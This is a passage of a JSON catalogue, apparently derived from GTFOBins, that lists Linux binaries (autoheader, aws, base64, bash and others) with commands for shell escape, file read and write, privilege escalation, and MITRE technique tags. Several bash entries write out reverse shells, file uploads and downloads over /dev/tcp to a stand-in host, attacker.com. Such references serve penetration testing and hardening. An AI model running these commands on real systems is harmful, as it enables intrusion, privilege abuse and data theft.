installation","aliases":[]},{"id":"gtfo:autoheader:shell:0:sudo","toolId":"gtfo:autoheader","toolName":"autoheader","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoheader","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/autoheader/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:autoheader:shell:0:unprivileged","toolId":"gtfo:autoheader","toolName":"autoheader","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoheader","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/autoheader/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:autoreconf:shell:0:sudo","toolId":"gtfo:autoreconf","toolName":"autoreconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\necho AC_INIT >configure.ac\nAUTOM4TE=/path/to/temp-file autoreconf","description":"The shell is invoked multiple times.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/autoreconf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:autoreconf:shell:0:unprivileged","toolId":"gtfo:autoreconf","toolName":"autoreconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\necho AC_INIT >configure.ac\nAUTOM4TE=/path/to/temp-file autoreconf","description":"The shell is invoked multiple times.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/autoreconf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aws:file-read:0:sudo","toolId":"gtfo:aws","toolName":"aws","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aws ec2 describe-instances --filter file:///path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aws/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aws:file-read:0:suid","toolId":"gtfo:aws","toolName":"aws","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aws ec2 describe-instances --filter file:///path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aws/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aws:file-read:0:unprivileged","toolId":"gtfo:aws","toolName":"aws","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aws ec2 describe-instances --filter file:///path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aws/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aws:inherit:0:sudo","toolId":"gtfo:aws","toolName":"aws","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"aws help","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aws/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aws:inherit:0:unprivileged","toolId":"gtfo:aws","toolName":"aws","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"aws help","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aws/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:base32:file-read:0:sudo","toolId":"gtfo:base32","toolName":"base32","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base32 /path/to/input-file | base32 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/base32/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:base32:file-read:0:suid","toolId":"gtfo:base32","toolName":"base32","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base32 /path/to/input-file | base32 --decode","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/base32/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:base32:file-read:0:unprivileged","toolId":"gtfo:base32","toolName":"base32","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"base32 /path/to/input-file | base32 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/base32/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:base58:file-read:0:sudo","toolId":"gtfo:base58","toolName":"base58","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base58 /path/to/input-file | base58 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/base58/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:base58:file-read:0:unprivileged","toolId":"gtfo:base58","toolName":"base58","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"base58 /path/to/input-file | base58 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/base58/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:base64:file-read:0:sudo","toolId":"gtfo:base64","toolName":"base64","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base64 /path/to/input-file | base64 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/base64/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:base64:file-read:0:suid","toolId":"gtfo:base64","toolName":"base64","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base64 /path/to/input-file | base64 --decode","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/base64/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:base64:file-read:0:unprivileged","toolId":"gtfo:base64","toolName":"base64","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"base64 /path/to/input-file | base64 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/base64/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:basenc:file-read:0:sudo","toolId":"gtfo:basenc","toolName":"basenc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basenc --base64 /path/to/input-file | basenc -d --base64","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/basenc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:basenc:file-read:0:suid","toolId":"gtfo:basenc","toolName":"basenc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basenc --base64 /path/to/input-file | basenc -d --base64","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/basenc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:basenc:file-read:0:unprivileged","toolId":"gtfo:basenc","toolName":"basenc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"basenc --base64 /path/to/input-file | basenc -d --base64","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/basenc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:basez:file-read:0:sudo","toolId":"gtfo:basez","toolName":"basez","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basez /path/to/input-file | basez --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/basez/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:basez:file-read:0:suid","toolId":"gtfo:basez","toolName":"basez","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basez /path/to/input-file | basez --decode","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/basez/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:basez:file-read:0:unprivileged","toolId":"gtfo:basez","toolName":"basez","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"basez /path/to/input-file | basez --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/basez/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bash:download:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -c '{ echo -ne \"GET /path/to/input-file HTTP/1.0\\r\\nhost: attacker.com\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n 3<>/dev/tcp/attacker.com/12345 \\\n | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } >/path/to/output-file'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:download:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -p -c '{ echo -ne \"GET /path/to/input-file HTTP/1.0\\r\\nhost: attacker.com\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n 3<>/dev/tcp/attacker.com/12345 \\\n | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } >/path/to/output-file'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:download:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"bash -c '{ echo -ne \"GET /path/to/input-file HTTP/1.0\\r\\nhost: attacker.com\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n 3<>/dev/tcp/attacker.com/12345 \\\n | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } >/path/to/output-file'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:download:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -c 'echo \"$(</dev/tcp/attacker.com/12345) >/path/to/output-file'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:download:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -p -c 'echo \"$(</dev/tcp/attacker.com/12345) >/path/to/output-file'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:download:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"bash -c 'echo \"$(</dev/tcp/attacker.com/12345) >/path/to/output-file'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-read:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bash -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-read:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bash -p -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-read:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bash -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-read:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"HISTTIMEFORMAT=$'\\r\\e[K'\nhistory -c\nhistory -r /path/to/input-file\nhistory","description":"This only works interactively from an existing `bash` session.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-read:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"HISTTIMEFORMAT=$'\\r\\e[K'\nhistory -c\nhistory -r /path/to/input-file\nhistory","description":"This only works interactively from an existing `bash` session.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-read:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"HISTTIMEFORMAT=$'\\r\\e[K'\nhistory -c\nhistory -r /path/to/input-file\nhistory","description":"This only works interactively from an existing `bash` session.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-write:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"bash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-write:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"bash -p -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-write:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"bash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-write:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"HISTIGNORE='history *'\nhistory -c\nDATA\nhistory -w /path/to/output-file","description":"This only works interactively from an existing `bash` session. It adds timestamps to the output file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-write:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"HISTIGNORE='history *'\nhistory -c\nDATA\nhistory -w /path/to/output-file","description":"This only works interactively from an existing `bash` session. It adds timestamps to the output file.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:file-write:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"HISTIGNORE='history *'\nhistory -c\nDATA\nhistory -w /path/to/output-file","description":"This only works interactively from an existing `bash` session. It adds timestamps to the output file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:library-load:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"bash -c 'enable -f /path/to/lib.so x'","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:library-load:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"bash -p -c 'enable -f /path/to/lib.so x'","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:library-load:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"bash -c 'enable -f /path/to/lib.so x'","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:reverse-shell:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"bash -c 'exec bash -i &>/dev/tcp/attacker.com/12345 <&1'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:reverse-shell:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"bash -p -c 'exec bash -p -i &>/dev/tcp/attacker.com/12345 <&1'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:reverse-shell:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"bash -c 'exec bash -i &>/dev/tcp/attacker.com/12345 <&1'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:shell:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:shell:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bash -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:shell:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"bash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:upload:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -c 'echo -e \"POST / HTTP/0.9\\n\\n$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:upload:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -p -c 'echo -e \"POST / HTTP/0.9\\n\\n$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 